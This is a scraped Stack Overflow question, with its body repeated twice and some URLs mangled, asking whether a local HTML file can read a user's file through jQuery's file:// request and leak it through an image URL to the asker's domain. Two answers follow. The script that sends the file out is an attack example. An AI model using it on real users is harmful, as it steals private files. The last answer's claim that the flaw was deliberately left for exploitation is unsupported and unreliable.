javascript - steal user's data by running html file - Stack Overflow

admin管理员组

文章数量:1402852

Let's talk about security. It seems to me, theoretically, I can get information from file system of a user with some script, if the user opens html file with it (opens from his file system, not from network). Look at the code:

info.txt:

my info

index.html:

<!doctype html>

<html>
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
    <script src=".8.1/jquery.min.js"></script>
    <script>
      $(document).ready(function () {
        $.get('file:///home/daz/desktop/info.txt', function (data) {
          $('<img>').attr('src', '=' + escape(data)).appendTo('body');
        }, 'text');
      });
    </script>
  </head>    
  <body></body>
</html>

Some browers (firefox, for example) allow you to get files from file:// through XmlHttpRequest, so if I guess path to the file, then I can get it's content by ajax. And then I can dinamically add img tag with src leading to my domain with parameters in query string. And browser make a request obediently GET ?data=my%20info%0A domain. And on the server side I can parse query string and get the data.

Am I right I can do this? Am I right I can get user's data from his puter if he opens my html file? So I can just say: "Hey, friend, check out this file!" (with 2 restrictions: user should use firefox or something else with similar configuration, and I cannot get files user cannot access because of access rights).

UPDATED:

If it is possible, then why it is possible? Why do they allow you to do such things. Why there is no confirm dialogs or something.

UPDATED 2:

It will be great if someone make a review about this issue. Thanks in advance!

Let's talk about security. It seems to me, theoretically, I can get information from file system of a user with some script, if the user opens html file with it (opens from his file system, not from network). Look at the code:

info.txt:

my info

index.html:

<!doctype html>

<html>
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
    <script src="http://ajax.googleapis./ajax/libs/jquery/1.8.1/jquery.min.js"></script>
    <script>
      $(document).ready(function () {
        $.get('file:///home/daz/desktop/info.txt', function (data) {
          $('<img>').attr('src', 'http://domain.?data=' + escape(data)).appendTo('body');
        }, 'text');
      });
    </script>
  </head>    
  <body></body>
</html>

Some browers (firefox, for example) allow you to get files from file:// through XmlHttpRequest, so if I guess path to the file, then I can get it's content by ajax. And then I can dinamically add img tag with src leading to my domain with parameters in query string. And browser make a request obediently GET ?data=my%20info%0A domain.. And on the server side I can parse query string and get the data.

Am I right I can do this? Am I right I can get user's data from his puter if he opens my html file? So I can just say: "Hey, friend, check out this file!" (with 2 restrictions: user should use firefox or something else with similar configuration, and I cannot get files user cannot access because of access rights).

UPDATED:

If it is possible, then why it is possible? Why do they allow you to do such things. Why there is no confirm dialogs or something.

UPDATED 2:

It will be great if someone make a review about this issue. Thanks in advance!

• javascript
• html
• security
• xmlhttprequest
• imagesource

Share Improve this question Follow edited Sep 8, 2012 at 5:18 Danil Speransky asked Sep 8, 2012 at 4:55 Danil SperanskyDanil Speransky 30.5k66 gold badges6969 silver badges7878 bronze badges 1

• Yes, this is entirely possible. – Brad Commented Sep 8, 2012 at 5:14

Add a ment  | 

2 Answers 2

Sorted by: Reset to default 5

It's less possible than you might think. Various browsers have implemented different restrictions on what local HTML files can do, as described in this post by the Chromium development team:

http://blog.chromium/2008/12/security-in-depth-local-web-pages.html

In particular:

• Internet Explorer disables Javascript in local HTML files by default
• Opera places some restrictions on cross-domain access from local files
• Firefox applies subdirectory restrictions to local file access

(Note that this post is from 2008; browsers -- especially Chrome -- may have changed significantly since then.)

Just an update: corporations are now using this exploit to steal the information of millions of users, tracking them without their knowledge and without using cookies. http://en.wikipedia/wiki/Device_fingerprint

It seems this flaw was intentionally left in their just so users could be exploited.

本文标签： javascriptsteal user39s data by running html fileStack Overflow